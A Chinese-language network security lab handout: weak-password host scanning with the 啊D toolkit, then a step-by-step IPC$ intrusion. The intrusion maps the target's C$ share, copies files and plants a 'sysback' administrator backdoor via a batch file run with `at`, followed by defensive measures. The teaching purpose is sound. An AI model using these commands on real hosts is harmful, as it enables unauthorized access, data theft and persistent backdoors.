【任务1:扫描网络中弱口令主机】
1. 任务目标
(1) 了解啊D网络工具包作用。
(2) 重视弱口令的安全隐患。
2. 任务内容
(1) 使用啊D网络工具包扫描本教室局域网段主机,找出弱口令主机。
3. 完成任务所需的设备和软件
装有Windows XP操作系统的PC机1台,或Windows Server 2003虚拟机1台,啊D网络工具包。
4.实验注意事项:关闭计算机上的杀毒软件以及防火墙。
5. 工具介绍
啊D网络工具包软件介绍:
1.共享资源查找 [为你查找网上的共享资源!]
2.肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用方便]
3.远程服务查看 [你可以查看和修改远程的服务,如关闭和启动Telnet,更方便!]
4.查看隐藏共享 [查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便]
5.查看用户组信息 [Win介面的查看远程机子的用户和组的信息,便用更方便!]
6.开远程的Telnet [直截开启微软自带的Telnet,开Telnet,原来也可以这么简单!]
7.3. NT消息发送 [向NT的机子发送消息,便用Win介面使用更方便!]
8.IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626]
9.端口扫描 [使你更加了解对方主机端口的打开状况]
10.网卡MAC [快速获取一个网段的 用户名、工作组、对方的网卡MAC地址]
11.网络状态查看 [想知道自己机子打开了什么端口吗?本程序可帮上你的忙!]
12.主机查询 [想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙!]
13.Ping [判断某IP是否和网络连接的好帮手!]
14.域名<=>IP [想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你!]
15.路由查看 [想知道某IP经过的路由?用本程序就可以给你答案!]
16.Finger [Finger能为你查询对方系统的用户信息!]
17.进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!]
18.本机IP [在上网的时候,想知道自己的IP吗?本程序可以为你办到!]
19.常用修改 [反恶意网页修改,恢复系统设置等]
20.查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了!]
【任务2: 基于IPC$弱口令的入侵】
1. 任务目标
(1) 了解IPC$作用。
(2) 了解基于IPC$入侵过程。
(3) 掌握防治IPC$入侵的方法。
2. 任务内容
(1) IPC$连接建立和断开。
(2) 建立后门账号。
(3) IPC$防范入侵采取的措施。
3. 完成任务所需的设备和软件
装有Windows XP操作系统的PC机1台, Windows Server 2003虚拟机1台,啊D网络工具包。
4.实验注意事项:关闭计算机上的杀毒软件以及防火墙。
实验步骤:
(1)IPC$连接建立和断开
下面用实例来介绍如何建立和断开IPC$连接,看看入侵者是如何将远程磁盘映射到本地的。通过IPC$连接进行入侵的条件是已获得目标主机管理员账号和密码。
本实验由组内同学互相结组完成,通过使用啊D网络工具包肉鸡查找功能,查找对方主机是否为弱密码或空密码,使用啊D网络工具包共享查找功能查找对方主机的共享目录,将其锁定为攻击对象,开始实施下列操作。
步骤一:在本机系统中,单击“开始”→“运行”,在“运行”对话框中键入“CMD”命令,打开命令行窗口,如图所示。
步骤二:建立IPC$连接。
使用命令:net use \\\\IP\\IPC$ "PASSWD" /USER: "ADMIN"与目标主机建立IPC$连接。(IP地址为你攻击的对方主机的IP地址)
参数说明:
IP:目标主机的IP。
IPC$: IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
PASSWD:替换成已经获得的管理员密码。
ADMIN:替换成已经获得的管理员账号。
例如:键入命令net use \\\\192.168.27.128\\ipc$ "" /user:"administrator",如图所示。(此例即为连接IP地址为192.168.27.128这台主机,使用administrator用户名,密码为空,用户名密码的获得可使用啊D网络工具包扫描获得)
步骤三:映射网络驱动器。
使用命令:net use z: \\\\192.168.27.128\\c$
参数说明:
“\\\192.168.27.128\\c$”表示目标主机192.168.27.128上的C盘,其中“$”符号表示隐藏的共享。
“z:”表示将远程主机的C盘映射为本地磁盘的盘符。该命令表示把192.168.27.128这台目标主机上的C盘映射为本地的Z盘,
如图所示。
映射成功后,打开“我的电脑”,会发现多出一个Z盘,上面写着“C$位于192.168.27.128上”,该磁盘即为目标主机的C盘,如图2-7所示。
步骤四:查找指定文件。
用鼠标右键单击Z盘,在弹出菜单中选择“搜索”,查找关键字“账目”,等待一段时间后,得到的结果如图所示
然后将该文件拷贝、粘贴到本地磁盘,其拷贝、粘贴操作就像对本地磁盘进行操作一样。
步骤五:断开连接。
键入“net use * /del”命令断开所有IPC$连接,如图2-9所示。
参数说明:
“*”表示所有的连接。
“/del”表示删除。
另外,通过命令net use \\\目标IP\\ipc$ /del可以删除指定目标IP的IPC$连接。
ipc$连接失败的原因 :
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。 关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,就靠大家自己体会和试验了。
(2) 建立后门账号
步骤一:编写批处理文件。在“记事本”中输入“net user sysback 123456 /add”和“net localgroup administrators sysback /add”命令,两条命令写两行,另存为hack.bat文件,将该文件存放在C:\\Documents and Settings\\founder目录下。(这两条命令的作用是建立一个名为sysback的账号,密码时123456,并将该账号加入到管理员组)
步骤二:与目标主机建立IPC$连接。(参考第一个例子的步骤)
步骤三:复制文件到目标主机。输入“copy hack.bat \\\192.168.27.128\C$”命令,把hack.bat文件复制到目标主机的C盘中(如果hack.bat文件没有存放到命令提示行默认的目录,请将hack.bat所在目录写上)。
步骤四: 通过计划任务使远程主机执行hack.bat文件,输入“net time \\\192.168.27.128”命令,查看目标系统时间。
步骤五:假设目标系统的时间为22:30,则可输入“at \\\192.168.27.128 22:35 c:\\hack.bat”命令(即在5分钟之后执行hack.bat),计划任务添加完毕后,使用“net use * /delete”命令,断开IPC$连接。
步骤六: 验证账号是否成功建立。过5分钟后,估计远程主机已经执行了hack.bat文件。通过sysback账号建立IPC$连接。若连接成功,说明sysback后门账号已经成功建立。或在运行中输入“mstsc.exe”使用远程连接登陆,使用建立的sysback账号登陆。
(3)IPC$入侵防范措施
① 删除默认共享,例如:net share IPC$ /delete”。(务必掌握,并进行操作,删除后可查看下共享是否已经被删除了)
②禁止利用空连接进行用户名枚举攻击。在注册表中,把HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa中的restrictanonymous子键的值改为1。修改完毕后重新启动计算机,这样便禁止了利用空连接进行用户名枚举攻击(nbtstat –a IP)。不过要说明的是,这种方法并不能禁止建立空连接。
③ 关闭Server服务。Server服务是IPC$和默认共享所依赖的服务,如果关闭Server服务,IPC$和默认共享便不存在,但同时服务器也丧失了其他一些服务,因此该方法只适合个人计算机使用。
④ 屏蔽139、445端口。没有这两个端口的支持,是无法建立IPC$连接的,因此屏蔽139、445端口同样可以阻止IPC$入侵。
操作方法:单击“开始 →控制面板→系统→硬件→设备管理器”,单击“查看”菜单下的“显示隐藏的设备”,双击“非即插即用驱动程序”,找到并双击 NetBios over Tcpip,在打开的“NetBios over Tcpip属性”窗口中,单击选中“常规”标签下的“不要使用这个设备(停 用)”,单击“确定”按钮后重新启动后即可。